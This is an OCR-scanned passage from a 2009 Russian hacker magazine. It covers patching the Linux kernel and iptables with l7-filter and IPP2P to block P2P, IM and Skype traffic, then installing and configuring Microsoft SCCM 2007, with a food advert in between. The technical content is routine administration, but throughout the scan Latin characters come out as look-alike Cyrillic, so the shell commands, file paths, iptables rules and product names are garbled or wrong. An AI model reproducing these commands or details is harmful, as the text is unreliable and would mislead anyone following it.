Ь7-Шіег позволяет ИехШхег идентифицировать пакет на прикладном 
уровне данных, основываясь на его содержимом, и классифицировать 
пакеты по их назначению, без привязки кномеру порта. В настоящее вре- 
мя поддерживаются протоколы НТТР и РТР; Р2Р сети (Кагаа, ВпТоггет, 
еЭопкеу2000, РазРГгаск); ІМ-системы (АІМ/іаЪЪег/ІКС/М5Ы); ѴоІР/ 
Зкуре; ѴР]Ч; игры (ВаиІейеЫ, С5, ЭоотЗ, ѴѴоѴѴ); файлы (ехе, трЗ) и даже 
черви вроде Собе Кеб и №тба. 

Проект предлагает две версии 17-йкег: 

• Кегпеі ѵегзіоп — развивается уже давно и хорошо протестирована; не- 
много сложна в установке, не очень дружит с 5МР-процессорами и позво- 
ляет использовать только самые простые регулярные выражения; 

• ІІзегзрасе ѵегзіоп — находится в ранней стадии развития, обладает 
большими возможностями по фильтрации, так как поддерживает весь 
спектр команд СЫИ §гер (возможно, в будущем будет поддерживаться 
только эта версия) . 

Несмотря на то, что версия шегзрасе стабильна в работе, ее не рекомен- 
дуют использовать на критических системах и для блокировки трафика. 
Ниже рассмотрим установку кегпеі-варианта 17-йкег, который затем 
дополним ІРР2Р. Для успешного проведения сборки в твоей системе 
должны быть установлены пакеты Ъиііб-еззепгіаі, ірііаЪІез, ірііаЪІез-беѵ и 
Нпих-зоигсе. Берем настройки текущего ядра, которые будем использо- 
вать как базовые, и копируем их в /изг/згс/Нпих: 

$ зибо ср /ЬооЕ/сопЕід- 'ипаше -г' /изг/зге/ііпих/ . 
сопЕід 

Получаем архив с патчами для ядра с сайта 17-Шхег (либо с прилагаемого кжур- 
налу диска) , распаковываем его и переходим в каталог с сырцами ядра: 



Совет №4. 

Пей и ешь био-овсяные продукты ѴЕНЕ! 

Это отличный способ добавить себе в организм полез- 
ных веществ. Лёгкий патч твоей антивирусной системы. 
1 минута - и загрузка завершена! Подробнее - в сетевых 
супермаркетах и на шѵѵѵѵ.ѵеііеоаіз.сот 




ѴЕИЕ 
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>> 5ѴМ/АСК 




ДЛЯ ВКЛЮЧЕНИЯ 1-7-РІІ-ТЕК НЕОБХОДИМО 
ПЕРЕСОБРАТЬ ЯДРО 



$ каг Х 2 ѵі пеккі1кег-1ауег7-ѵ2 . 21 . каг . дг 
$ ссі /изг/згс/ііпих 

В архиве несколько патчей для разных версий ядер и іріаЫез. Нужно вы- 
брать вариант для своего ядра (в настоящее время есть патчи только до 
2.6.28): 

$ зисіо ракск -рі < . . /пеккі1кег-1ауег7-ѵ2 . 21/ког_о1сіег_ 
кегпе1з/кегпе1-2 .6.22-2.6. 24-1ауег7-2 . 18 . ракск 

Аналогично патчим іріаЫез: 

$ ссі . . /іркаЫез 
$ іркаЫез -ѵ 
іркаЫез ѵі . 3 . 8 

$ зисіо ракск -рі < . . /пеккі1кег-1ауег7-ѵ2 . 2 1/іркаЫез- 
1 . З-ког-кегпеІ-2 . 6 . 2 0когмагсі-1ауег7-2 . 21 .ракск 
$ зисіо скшосі +х ехкепзіопз/ . 1ауег7-кезк 

Собираем іріаЫез: 

$ таке КЕЕМЕБ_БІЕ=/изг/згс/1іпих 
$ зисіо таке іпзкаіі 

Теперь конфигурируем и компилируем ядро: 

$ зисіо таке теписопкід 

Переходим в «МеГ\люгкіп§ — НеОл/огкт§ оргіоп — Иеіѵѵогк раскеі 
Пкегт§ ГгатеѵѵогкСМеіШіег) — Соге ИеШкег СопН&игаНоп», где 
активируем «Соппесгіоп ігаскіп^ Поѵѵ ассоитлп^» и «Ьауег 7 таіск 
зирроги». На этой же вкладке активируется модуль зігіп^, о кото- 
ром говорилось выше, поддержка ИеіТікег отдельных протоколов 
(РТР, Н323 и пр.) и другие полезные функции. Ставим фильтры 
протоколов; фактически они просто копируются в каталог /еіс/17- 
ргоіосоіз: 

$ каг хзѵк 17-ргокосо1з-2009-05-28 . каг . дг 
$ ссі 17-ргокосо1з-2009-05-28/ 

$ зисіо таке іпзкаіі 

После перезагрузки можно проверить работу фильтра. Команда «іріаЫез 
-т 1ауег7 -Ьеір» вьщаст список параметров. Например, чтобы заблокиро- 
вать ВкТоггеШ, АІМ и Зкуре, пишем: 

іркаЫез -А ЕОЕШАЕБ -т 1ауег7 -17ргоко Ыккоггепк -д 
БЕОР 



іркаЫез -А РОЕШАЕБ -т 1ауег7 -17ргоко аіт -} БЕОР 
іркаЫез -А ЕОЕШАЕБ -т 1ауег7 -17ргоко зкурекозкуре -3 
БЕОР 

іркаЫез -А РОЕѴІАЕБ -т 1ауег7 -17ргоко зкуреоик -3 БЕОР 

Далее блокируем по аналогии: ищем в списке название протокола и ба- 
ним. 

СТАВИМ ІРР2Р Сейчас рассмотрим установку ІРР2Р — проекта, ко- 
торый специализируется на Р2Р-сервисах. Как и 17-Шіег, он является 
надстройкой над НеШкег/іріаЫез, с которым легко интегрируется. 
Его функциональность расширяется за счет добавления новых правил. 
Для идентификации протокола ІРР2Р использует подготовленные шаб- 
лоны. Кроме блокировки трафика, ІРР2Р можно использовать для его 
маркировки, например, чтобы задавать меньший приоритет или канал. 
Учитывая, что все у нас уже подготовлено, описание установки много 
места не займет. Забираем с БУБ-диска архив с исходными текстами 
ірр2р-0.8.2.і:аг.§2, накладываем патч ірр2р-0.8.2-кегпе1-2.6.22.раі:сІі и 
пробуем установить: 

$ зисіо таке 

Скорее всего, в ответ получим ошибку «ірр2р-0.8.2/МакеШе:36: 
Уои пееб но іпзіаіі іріаЫез зоигсез апб тауЬе зеі ІРТАВЬЕ5_5КС». 
В инструкции по установке сказано, что скрипту нужно правиль- 
но указать на каталог, в котором находится заголовочный файл 
ірНаЫез.Ь. В нашем случае это — /изг/згс/ірнаЫез. Открываем 
МакеШе и правим: 

$ зисіо папо МакеШе 

I РТАВБЕ 8 _ 8 ЕС = $ (Ыісісагсі /изг/згс/іркаЫез ) 

#СЕЬАС 8 = -ОЗ -Ш11 

Повторяем попытку. Если ядро ранее не собиралось, например, ты решил 
обойтись без 17-Шнег, то перед сборкой ІРР2Р следует установить исходни- 
ки и ввести «таке оИсопй§ && таке ргераге» (иначе процесс сборки ІРР2Р 
завершится неудачей) . По окончании компиляции переносим НЬірі:_ірр2р. 
зо в каталог с библиотеками ірНаЫез: 

$ зисіо ср 1іЬірк_ірр2р . зо /изг/ІіЬ/іркаЫез 

Загружаем модуль: 

$ зисіо ср 1іЬірк_ірр2р . зо /ІіЬ/іркаЫез 

$ зисіо ср ірк_ірр2р.ко /ІіЬ/тосіиІез/ 'ипате -г'/кегпеі/ 
пек/ірѵ4 /пеккіікег 

$ зисіо тосіргоЬе ірк_ірр2р 

$ зисіо Ьазк -с " еско ірк_ірр2р » /екс/тосіиіез " 

Все готово! Смотрим список параметров: 

$ зисіо іркаЫез -т ірр2р --кеір 

И блокируем все, что ненужно: 

іркаЫез -А ЕОЕѴІАЕБ -т ірр2р --есік --казаа --дпи --Ьік \ 
--арріе — сіс --зоиі --тптх --агез -3 БЕОР 

ЗАКЛЮЧЕНИЕ Теперь лазеек в сети не останется, хотя это не должно усып- 
лять твою бдительность. Надо запретить доступ к ІІЗВ/СВ/ПѴТ), прокон- 
тролировать, какие программы установлены на компьютерах пользовате- 
лей и заблокировать возможность самостоятельной их установки, ц-ц 



► 120 



ХАКЕР 08 /128/ 09 





>> ЗѴЫ/АСК 



СЕРГЕИ «6РІЫ0ЕР» ЯРЕМЧУК 

/6РІЫ0ЕРІВ5УМАСК.РУ / 



Начальниксети 

5ССМ: решение для автоматизации управления 
ІТ-инфраструктурой 

Чтобы не бегать по этажам и высвободить время для сетевых баталий, 
каждый админ, вне зависимости отуровня подготовки, старается опти- 
мизировать процессуправления ІТ-инфраструктурой компании. 

В ход идут все доступные средства — отсамописных и готовых скриптов 
до политикбРО и прога-ля Рабтіп. В итоге собирается зоопарк 
из разнородных помощников, что только усложняетадминистрирование. 
МісгозоЙ предлагает единое решение — Зузіепп СепІегСопІідигаІіоп 
Мападег, обеспечивающее ІТ-подразделение всем необходимым 
для автоматизации управления. 



НАЗНАЧЕНИЕ И ВОЗМОЖНОСТИ 5ССМ Дис- 
петчер 5ССМ 2007 К2 Г ѵуѵѵѵу.тісгозобг.сот/ 
зузіетсепіег/сопй^игагіоптапа^ег) — это 
усовершенствованный вариант Зузіетз 
Мапа^етепі: Зегѵег (5М5). Он призван обес- 
печивать в динамично изменяющихся средах 
возможность по управлению и полному конт- 
ролю над всей ІТ-инфраструктурой. Префикс 
Зузгет Сепіег свидетельствует о принадлеж- 
ности продукта к семейству средств управле- 
ния, в котором Сопй^игагіоп Мападег несом- 
ненно является ключевым продуктом. Среди 
задач, решаемых при помощи 5ССМ — ввод 
серверов в эксплуатацию, установка приложе- 
ний, управление обновлениями, развертыва- 
ние ОС Місгозоід, поддержка желаемой конфи- 
гурации (Эезігесі СопЯ^игагіоп, контролирует 
соответствие эталонных конфигураций ре- 
альным конфигурациям систем по набору 
параметров: оборудование, ОС, приложения 
и их настройки), инвентаризация софта и 
оборудования и многое другое. В семейство 
5 С Г ѵѵѵѵѵѵ.тісгозобіі.сот/зѵзііетсепгег) входят 
несколько продуктов, дополняющих его фун- 
кционально. В комплексе это позволяет полу- 
чить наиболее подходящую среду управления 
для сетей разного размера и назначения: 

• Раіа Ргоіесііоп Мападег — возможность 
резервного копирования и восстановления 
данных на файловых серверах ѴѴіпсіоѵѵб; 

• Орегаііопа Мападег — управление обору- 
дованием и программным обеспечением; 

• Е88еп*іаІ8 — позволяет производить уста- 
новку ПО, автоматизировать обновление и от- 
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слеживать состояние распределенных систем 
в небольших организациях, предназначен для 
малоопытного персонала; 

• ѴігШаІ МасЬіпе Мападег — управление 
виртуальными серверами; 

• Сарасііѵ Ріаппег — планировщик ре- 
сурсов, позволяет определить требования к 
оборудованию, необходимому для запуска 
приложения, с обеспечением нужного уровня 
производительности и доступности; 

• 8егѵісе Ре§к — управление внештатными 
ситуациями, в том числе неполадками и изме- 
нениями среды; 

• МоЬіІе Реѵісе Мападег (МРМ) — пол- 
ный набор средств управления устройствами 
ѴѴіпсІоѵѵз МоЬіІе; 

• Керогііп# Мападег — получение самых 
разнообразных отчетов. 

РАЗБОРКИ С ТЕРМИНАМИ И КОМПОНЕН- 
ТАМИ Вначале — несколько терминов, чтобы 
легче было понимать, о чем мы будем говорить 
далее. Под сайтами (5пе зузіет) понимается 
сервер или группа серверов, выполняющих 
функции 5ССМ. 5ССМ может быть установлен 
в варианте 5Іп§1е-5Іі:е или тиШ-зПе. Во втором 
случае есть возможность распределить на- 
грузку между несколькими серверами 5ССМ. 
Здесь доступны два режима работы сайтов — 
основной (Ргітагу зііе, своя базаданных) идо- 
полнительный (Зесопбагу зііе, используют БД 
с Ргітагу зііе). Один из Ргітагу сайтов в этой 
иерархии является центральным (Сепігаі 
5йе) . Функции, которые выполняет сайт, зави- 



сят от роли (компонентов). 5ССМ поддержи- 
вает следующие роли: 

• точка управления (Мапа^етепіроіпі:); 

•точка распространения (ВІТ8-епаЫесІ 
<ІІ8(гіЪи(іоп рот*) ; 

•точка формирования отчетов (Керог*іп§ 
роіп*); 

• точка обновления программного обеспече- 
ния (8о*1гѵѵаге Іірсіаііе Роіп*); 

• точка обнаружения серверов (8егѵег 
Іосаіогроіп*); 

• точка проверки работоспособности системы 
(РаІІЪаск 8іа(и8 рот*, только ѴѴіпгкв). 

Сайт может совмещать несколько ролей, или 
роли могут быть разнесены на несколько сер- 
веров. Одна из специфическихролей — ВгапсЬ 
бізтЪигіоп роіпі:. Она предназначена для уп- 
рощения обслуживания особо маленьких 
филиалов организации (3-5 компьютеров в 
рабочей группе) и отвечает лишь за распро- 
странение программ и обновлений. Для ее ис- 
пользования можно выбрать клиентскую ОС 
без ЗС^Ь-сервера. 

Непосредственно на рабочих станциях уста- 
навливается клиентская часть СНеп* А§епГ, при 
помощи которой собственно и производится уп- 
равление . Агент может работать в режиме №гіѵе 
(новая версия и зашифрованный канал) или 
Міхеб (клиент 5М5). В режиме Иайѵе возмож- 
но подключение клиентов через интернет (по 
НТТР5) . Для каждого сайта определяются грани- 
цы, то есть зона действия (диапазон ІР, подсеть) . 
Это нужно, чтобы включить (или наоборот ис- 
ключить) системы в процессуправления. 

► 121 





ТРЕБОВАНИЯ КУСТАНОВКЕ БССМ 

В настоящее время доступна стабильная версия 5ССМ К2, которая 
поддерживает ѴѴіпХР/2003/ѴІ5і:а5Р1/2к8, и бета 5ССМ 5Р2, в кото- 
рую включена поддержка новых ОС ѴѴіп7/2к8К2/2к85Р2. Список 
клиентских ОС не должен вводить в заблуждение: для ѴѴіпХР, Ѵізш и 
ѴѴіп 7 доступно ограниченное количество ролей, в частности ВгапсЬ 
бізтЪіЛіоп роіт. Поэтому для установки следует выбирать именно 
серверную ОС. Версия К2 доступна в двух вариантах: как обновление 
к предыдущей 5Р1 или Риіі. Последнюю скачать пока нельзя, но есть 
возможность получить готовый к работе УНБ-образ с предустановлен- 
ным 5ССМ. 

Для инсталляции нам понадобится, какминимум, двафайла ЗССМсЗРІ 
и К2. И хотя процесс установки сайта 5ССМ, можно сказать, достаточ- 
но тривиален, непосредственно перед ее началом следует определить- 
ся с рядом вопросов, чтобы упростить себе жизнь в будущем. В первую 
очередь, со структурой системы 5ССМ: надо выбрать между зіп^іе-зке 
и тиШ-зке, продумать именование, режим работы, процесс развер- 
тывания агентов и так далее. Вопросов на самом деле много, и после 
установки изменить некоторые настройки не так-то просто. Подробно 
вопрос планирования рассмотрен в двух документах: «Планирование 
и развертывание инфраструктуры сервера для СопЯ^игагіоп Мапа^ег 
2007» и «Планирование и развертывание клиентов для СопЯ^игабоп 
Мапа^ег 2007», которые ты найдешь в ТесЬНеЕ 

Минимальные требования к оборудованию — РШ 733 МГц, 256 Мб 
ОЗУ, 5 Гб на харде и 10 Мбит сетевуха. В зависимости от роли мини- 
мальную планку придется существенно поднимать, например, если 
сайт будет выполнять развертывание ОС, то для хранения образов по- 
надобится очень много места на харде и, в идеале, гигабитная сетка. 
Перед установкой также следует выполнить ряд требований, предъ- 
являемых к программному обеспечению. На сервере должен работать 
5(2 Ь Зегѵег 2005 5Р2 ( уо.тісго5оЯ.сот/І : ѵѵ1іпк/?ГіпкІ(і - 69795 ) , при- 
чем только полная версия. Ехргезз Ебкіоп не поддерживается. В зави- 
симости от роли сервера, потребуется наличие: 115 не ниже 6.0, ММС 

3.0, ЫЕТ Ргатеѵѵогк 2.0, АЗР.ЫЕТ, ВІТ5 (Васк^гоипб Іпіеііі^епі: Тгапзіег 
Зегѵісе) и ѴѴеЪОАѴ. Также во время установки нужно накатить ряд 
хотфиксов (если это не сделано до сих пор), для ѴѴіп2кЗ их будет пре- 
достаточно. Кстати, возможна установка Ргітагу и Зесопбагу сайтов 
на КСШС (контроллер домена только для чтения) . В режиме Ргітагу 
мастер инсталляции определяет, что он устанавливается на такой КД, 
и автоматически произведет поиск КД, доступного для записи, чтобы 
создать группы, необходимые для работы сайта. Для Зесопбагу группы 
придется создать вручную. 

В дальнейшем я покажу установку 5ССМ на ѴѴіп2к8 в варианте зіп^іе- 
зке как Ргітагу зке. Для упрощения будем считать, что система уже 
установлена, сервер подключен к АБ, а ЗС^Ь-сервер функционирует. 
Вызываем «Диспетчер сервера», переходим в «Компоненты — Доба- 
вить компоненты» и отмечаем «Серверные расширения ВІТ5». Полу- 
чив запрос на установку зависимых компонентов, в том числе и ИЗ 

7.0, подтверждаем его, нажав «Добавить требуемые службы роли». 
Отмечаем компонент «Удаленное разностное сжатие», позволяющее 
передавать по сети только разницу между файлами, минимизируя тра- 
фик. Переходим к шагу выбора служб ролей. Для ИЗ здесь активируем 
АЗР.НЕТ иАЗР (нужен для точки формирования отчетов), «ѴѴіпбоѵѵз — 
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проверка подлинности», «Совместимость метабазы ИЗ 6» и «Совмес- 
тимость ѴѴМІ в ИЗ 6». Попутно соглашаемся с установкой необходимых 
компонентов. Все, ставим. 

ѴѴеЬБАѴ не входит в состав компонентов ѴѴіп2к8 ! Чтобы добавить под- 
держку, скачиваем архив под х86 или х64 версию ( ^о.тісгозоЯ.сот/ 
1ѵѵ1іпк/?ІлпкЮ = 141805. го.тісго50й.сот/Міпк/?ГіпкІР = 141807) и 

устанавливаем. 

После установки следует включить ѴѴеЬБАѴ и создать авторское прави- 
ло. Для этого вызываем «Диспетчер служб ИЗ» (в меню «Администриро- 
вание»), переходим в БеГаик \УеЬ ЗКе и выбираем «ѴѴеЬБАѴ АиіЬогіп§ 
Киіез». Нажав ссылку «ЕпаЫе ѴѴеЪОАѴ», запускаем ѴѴеЬПАѴ. Теперь до- 
бавляем авторское правило. Нажимаем ссылку «Абб АіпЬогіп^ Киіе». 
Появляется мастер. Устанавливаем «АП Сотет», «АП изегз» и в поле 
Регтіззіопз — «Кеаб». Редактируем настройки ѴѴеЬПАѴ, выбрав ссылку 
«ѴѴеЪОАѴ Зетп§$»: 

• АІ1о\ѵ апопутоив Ргорегіу (^иегіез (Разрешить анонимные 
запросы свойств) -> Тше; 

• АІ1ол/ѵ Сизіот Ргорегііез (Разрешить пользовательские 
свойства) -> Еаізе; 

• АІ1оі/ѵ ргорегіу ^ие^іе$ і/ѵііЬ іпГіпіІе беріЬ (Разрешить запро- 
сы свойств с бесконечной глубиной) 4 Тше; 

• АШгѵѵ Ьіббеп Шее Іо Ье Іізіеб (Разрешить перечисление 
скрытых файлов) -4 Тше. 

По окончании настроек нажимаем «Применить» и выходим из «Дис- 
петчера ИЗ». 

По умолчанию настройки ИЗ блокируют некоторые типы файлов, 
что может помешать работе точек распространения. Если такое 
происходит, определи разрешенные типы файлов. Для этого от- 
крой файл аррНсаЯопНозЕсопЯ^, который расположен в %ѵѵіпбіг%\ 
Зу5і:ет32\іпеі:5гѵ\сопН§, найди секцию <ШеЕхИеп5юпз> разде- 
ла <^е^ие51:Еі11:е^іп§> и для требуемого расширения установи 
а11оѵѵеб = "і:ше". Например: 

<абб Гі1еЕх1іепзіоп= " . ^аѵа" а11оѵ7еб=" Егие" /> 

Но разрешаем лишь то, что действительно необходимо. 

ПОДГОТОВКА К УСТАНОВКЕ 5ССМ Скачиваем и распаковываем дис- 
трибутив с 5ССМ 5Р1 (Соп1і§М§г075Р1Еѵа1_КТМ_КІІ5_6221.ехе). Пе- 
ред непосредственной установкой следует выполнить еще ряд подго- 
товительных действий. Первым делом установим расширение схемы 
для АБ. Это просто. 

Переходим в подкаталог, куда распакован 5ССМ, затем в 5М5ЕТОР — 
ВІкГ, каталог, соответствующий архитектуре (например х64), и запус- 
каем из консоли или двойным щелчком файл ехтбзсЬ.ехе. Програм- 
ма берет все данные из файла Сопй§М§г_аб_5кета.1б1 и не выдает в 
консоль никакой информации по своей работе, но результат можно 
получить из журнала СЛЕхіАОЗсЬЛо^. При необходимости правим 
Сопй§М§г_аб_5кета.1бГ Чтобы внесенные изменения вступили в 
силу, запускаем команду «Ібіібе -і -1 Сопй§М§г_аб_5кета.1б1». 

При щелчке по зріазк.іпа (будет доступен после распаковки) появ- 
ляется окно выбора. Непосредственно перед запуском программы 
установки нужно выбрать «Кип 1:Ье рге^ішке скескег» и проверить, 
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ПРОВЕРКАПРИ ПОМОЩИ РКЕКЕ0Ш5ІТЕ 
СНЕСКЕР ПОМОЖЕТУЗНАТЬ, ВСЕ ЛИТРЕ- 
БОВАНИЯ ДЛЯ УСТАНОВКИ 5ССМ ВЫПОЛ- 
НЕНЫ 
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насколько готов твой сервер к инсталляции 5ССМ. В поя- 
вившемся окне три параметра: требуется выбрать тип сай- 
та (Ргітагу, Зесопбагу и СМ Сопзоіе); для Ргітагу вводим 
имя машины, на которой находятся ЗС^Ь-сервер, ѴѴЗИЗ и 
Мапа^етепі: Роіпі: (сайт, используемый для соединения с 
агентами). Если сервер ѴѴ51І5 уже установлен, на локаль- 
ной системе соответствующий пункт «ЗБК Зегѵег» будет 
пропущен. На первый взгляд непонятно, какое отноше- 
ние ЗОК имеет к ѴѴ51І5, но после чтения доков становится 
ясно, что комплект средств разработки тут совсем не при 
чем, просто сходная аббревиатура. ЗОК-сервер проверяет 
наличие консоли управления ѴѴ51І5, поскольку сервер об- 
новлений может находиться на другой системе. 

После сканирования будет выдан список недочетов; вы- 
бор любого из пунктов предоставит подробную информа- 
цию и, возможно, путь к их устранению. Когда чекер вы- 
даст «Зиссезз» (все тесты пройдены), можно переходить к 
установке 5ССМ. 

УСТАН0ВКА5ССМ Выбираем в меню «Іпзгаіі СопЯ^игагіоп 
Мапа^ег 2007» и следуем за указаниями мастера. Первый 
шаг рассказывает, что нам нужно для установки, но мы уже 
все проверили при помощи чекера, и его можно пропус- 
тить. 

Далее визард предложит на выбор несколько пунктов, 
позволяющих установить 5ССМ или административную 
консоль, обновить 5М5 2003 и удалить 5ССМ. Так как 
ничего из этого пока нет, нас интересует пункт «Іпзііаіі а 
Сопй^игагіопМапа^егзЦе зегѵег». Подтверждаем согласие 
с условиями лицензии и переходим к этапу «Іпзіаііагіоп 
5ешп§», на котором нам предстоит выбрать вариант уста- 
новки — Зітріе или Сизіют. Если ты еще не знаком с 5ССМ, 
смело указывай Зітріе. В дальнейшем все параметры мож- 
но переопределить, хотя и придется поискать. Мы же вы- 
бираем Сизтт и проходим следующие шаги: 

• Зііеігѵре — выбор типа сайта. Ргітагу или Зесопбагу. Так 
как у нас это первый сайт, отмечаем Ргітагу. 

• Сизіотег Ехрегіепсе Ітргоѵетепі: Рго^гат 
СопГі^игаііоп — подключение к программе СЕІР, соби- 
рающей инфу о настройках систем. Предлагается в целях 
улучшения 5ССМ (на твое усмотрение, — я отключаю) . 

• Вводим ключ (для демо не требуется), указываем путь 
для установки или оставляем предложенное по умолча- 
нию значение. 
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ДЛЯ УСТАНОВКИ 5ССМ ПОТРЕБУЕТСЯ N5, ВІТ5 И НЕКОТОРЫЕ 
ДРУГИЕ КОМПОНЕНТЫ 



• §ке §еЦіп% 8 — вводим код сайта (любую удобную ком- 
бинацию, например, 000 для корневого сайта) и его опи- 
сание. 

• §ііе Моде — выбор режима Ыаіііѵе или Міхеб. Для Ыаіііѵе 
понадобится готовый сертификат, то есть развернутая 
структура РКІ. 

• СНепі А%еп1: Зеіесііоп — установки по умолчанию 
для агента, определяющие его возможности — инвента- 
ризация железа и ПО, обновления, ЫАР (Ыеі:ѵ\гогк Ассезз 
Ргогесгіоп, технология защиты сетевого доступа) и т.д. За- 
тем их можно перенастроить индивидуально. 

• РаіаЪазе зегѵег — расположение ЗС^Ь-сервера и имя 
для создаваемой базы данных. 

• ЗМЗ РгоѵісІег ЗеНіп^ — расположение провайдера 
5М5, то есть компонента, который будет взаимодейство- 
вать с базой данных. По умолчанию предлагается локаль- 
ная система, ее и оставляем. 

• Мапа^етепі Роіпі — установка компонента, отвеча- 
ющего за сбор данных с агентов. Поступаем, как в преды- 
дущем пункте; 

• Рогі ЗеШп^ — установка ТСР-порта для подключения. 
По умолчанию — 80 и 443 (в Пагіѵе тобе) . 

• Црбаіеб Ргегедиізііе сотропепіз — загрузка обнов- 
лений с узла Місгозоіг или локальной папки. 

Пропустить последний шаг нельзя, поэтому указываем ка- 
талог, куда будут загружены обновления (эти файлы мож- 
но будет указать во время установки на другой системе) . 
После проверки свободного места (> 5 Гб) на разделе и 
запуска «Рге^шзйе СЬескег» нажимаем «Ве^іп Іпзгаіі» и 
ставим 5ССМ. Установка обновлений — последний этап, 
и он займет некоторое время. После установки 5Р1 обнов- 
ляем до К2 обычным способом. 

РАСПРОСТРАНЕНИЕ КЛИЕНТОВ Так как 5ССМ рабо- 
тает по клиент-серверной схеме, следующим этапом 
после установки сайта будет развертывание клиент- 
ских приложений, которые и выполнят всю основную 
работу по сбору данных, распространению ПО и пр. 
Консоль управления СМ, вызываемая из меню «Пуск», 
имеет стандартную структуру, и освоиться в ней бу- 
дет просто. 5ССМ способен обеспечить управление не 




> іпіо 

• Об установке и 



настройке ѴѴ51І5 3.0 
5Р1 на ѴѴіп2к8 читай 
в статье «Каждому по 
заплатке», опублико- 
ванной в январском 
номере НЕ за 2009 
год. 

• Непосредственно 
перед установкой 
следует запустить 
«Рип Йзе ргегедиівйе 
сбескег». Это сэконо- 
миттебе время. 
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> Ііпкз 

• Страница проекта 
5ССМ 2007 — ѵѵѵѵѵѵ. 
т іеговой .сот 
/зѵвіетсепіег/ 
сопіідигайоп 
тападег . 

• Страница на 
ТесЬЫеІ, посвящен- 
ная 5ССМ — Іесбпей 
т іеговой, со т/ги-ги/ 
сопіідтдг . 
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УКАЗЫВАЕМ ГРАНИЦЫ САЙТА 



> СІѴСІ 

На прилагаемом 
кжурналу диске 
ты найдешь видеоро- 
лик, в котором пока- 
зано, какустановить 
5ССМ 2007 на ѴѴіп2к8 
и настроить распро- 
странение клиентов. 



одной тысячи компьютеров, поэтому введены неко- 
торые разграничения. Так, каждый сайт для работы с 
клиентами имеет границы (зіге Ъоипйагу), все ресур- 
сы, входящие в эту область, могут быть обнаружены 
(Бізсоѵегу) и одобрены (арргоѵаі). Важно понимать 
эту иерархию. Сайт 5ССМ никогда не сможет обнару- 
жить и, тем более, одобрить клиента за пределами зйе 
Ъоипйагу. 

Находим в списках консоли свою БаііаЪазе и переходим 
в «5пе тапа^етепі; — название сайта — 5йе зетп^з». 
Параметры обнаружения настраиваются в меню 
«Воипсіагіез». После установки здесь, естественно, пус- 
то, поэтому выбираем ссылку «Ыеѵѵ Воітйагу» и в поя- 
вившемся окне заполняем описание (Безсгіргіоп), сайт, 
к которому будет относиться настройка (он у нас пока 
один), и тип (Туре). Последнее поле определяет метод 
обнаружения клиентов; возможны четыре варианта: 
ІР-зиЪпеі: (подсеть), Асгіѵе БігесШгу зне, ІРѵб ргеПх и ІР- 
асМгезз гап^е. Выбираем пункт, наиболее удовлетворяю- 
щий условиям, и заполняем предложенные поля. Допол- 
нительное поле «Пеі:ѵ\гогк Соппесгіоп», расположенное 
внизу страницы, позволяет указать на скорость сети: 
Рази (ЬАП) или 5Іоѵѵ. Нажимаем «ОК», — новая запись по- 
является в окне «Воипсіагіез», впоследствии указанные 
параметры можно будет уточнить. 

Переходим в «Бізсоѵегу тегЬойз», где находим 6 пунктов, 
соответствующих различным механизмам обнаружения 
клиента. Из них 4 относятся к Асгіѵе БігесШгу — системы, 
пользователи и группы компьютеров, Зесигйу; также есть 
НеагЛеаІ (проверка состояния) и Ыеі:ѵ\гогк (сетевые уста- 
новки) . Пункт «ЫеИѵѵогк сіізсоѵегу» задействуется в случае, 
если в сети не используется АБ. Двойной щелчок по любо- 
му пункту вызовет окно свойств, для каждого оно будет 
различаться. Минимум, что нужно сделать — это активи- 
ровать выбранный метод обнаружения, установив фла- 
жок «ЕпаЫе ...» (по умолчанию включен только НеанЪеаі: 
Бізсоѵегу) . 

Для методов, использующих АБ, необходимо задать средс- 
тво для поиска объектов (локальный домен, ЬБАР запрос и 
т.д.), затем контейнер, содержащий объекты. По умолча- 



ВЫБИРАЕМ ТИП САЙТА ВО ВРЕМЯ УСТА- 
НОВКИ 5ССМ 



нию обнаружение производится раз в день, и обычно этого 
достаточно. Но на первых порах расписание поиска можно 
изменить, перейдя во вкладку «Ро11іп§ ЗсЬесІиІе» и указав 
меньшее время. Чтобы ускорить обнаружение новых объ- 
ектов, установи флажок «Кип сіізсоѵегу аз зооп аз роззіЫе». 
Вкладка «Асгіѵе БігесЮгу атгіЪіЛе» позволяет указать атри- 
буты, которые будут использованы для обнаружения. 

В «Ыетогк сіізсоѵегу» несколько больше параметров, поз- 
воляющих управлять обнаружением. Например, в поле 
«Туре оГ сіізсоѵегу» можно указать три варианта: тополо- 
гия, + клиент и + ОС. Остальные вкладки — «ЗиЪпеСз», 
«Ботаіпз», «5ЫМР», «5ПМР Беѵісез» и «БНСР» позволяют 
уточнить параметры обнаружения клиентов. Например, 
во вкладке «5иЪпеі:5»указывается адрес подсети, в которой 
будут обнаруживаться клиенты, а во вкладке «Зсйесіиіе» 
настраивается расписание. 

Клиенты потихоньку обнаруживаются. Теперь их не- 
обходимо утвердить. Вызываем из контекстного меню 
свойства сайта. Здесь несколько вкладок. В «ѴѴаке Оп 
ЬА]Ч» можно разрешить «пробуждение» удаленной 
системы, если это необходимо для установки обнов- 
лений/приложений. В «Рогсз» указываются порты для 
подключения клиентов. Вкладка «Айѵапсесі» позволяет 
определить, что делать при обнаружении двух клиен- 
тов, имеющих одинаковый Ьагсіѵѵаге ІБ. По умолчанию 
автоматически создается отдельная учетная запись 
«Аиштаііісаііу сгеасе пеѵѵ сііеш: гесогйз ...». Чтобы разре- 
шать такие конфликты вручную, следует установить пе- 
реключатель в «Мапиаііу гезоіѵе сопШсгіп^ гесогйз». Ос- 
тальные подпункты «Айѵапсесі» позволяют публиковать 
сайт 5ССМ в АБ и обмениваться ключами. В «Зесигйу» 
настраиваются параметры учетных записей для доступа 
иуправления 5ССМ. И, наконец, в «5йе Мойе» устанавли- 
вается (точнее, изменяется) режим работы сайта (Магіѵе 
или Міхей) . Как будут обнаруживаться клиенты, зависит 
от настроек поля «Арргоѵаі зетп^з»: 

• Мапиаііу арргоѵе еасЬ сотриіег — каждый компью- 
тер подтверждается вручную, его можно использовать 
только в небольших сетях или после того, как все клиенты 
установлены, а настройки уже произведены; 
• Аиіотаіісаііѵ арргоѵе сотриіега іп Ігиаіесі 
<іотаіп5 ГгесоттепсІесГ) — все системы из доверен- 
ных доменов в области Бізсоѵегу будут одобрены автома- 
тически; 

• Аиіотаіісаііу арргоѵе аіі сотриіегз (по! 
гесоттепйесП — все обнаруженные компьютеры будут 
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утверждены автоматически. Выбирать этот пункт имеет смысл, толь- 
ко в случае, если не используется АБ, то есть второй пункт не подходит. 
Естественно, сеть должна быть должным образом защищена. 
Взведенный флажок « ТЬіз зііе сопіаіпіз опіѵ СопД%М%г 2007 
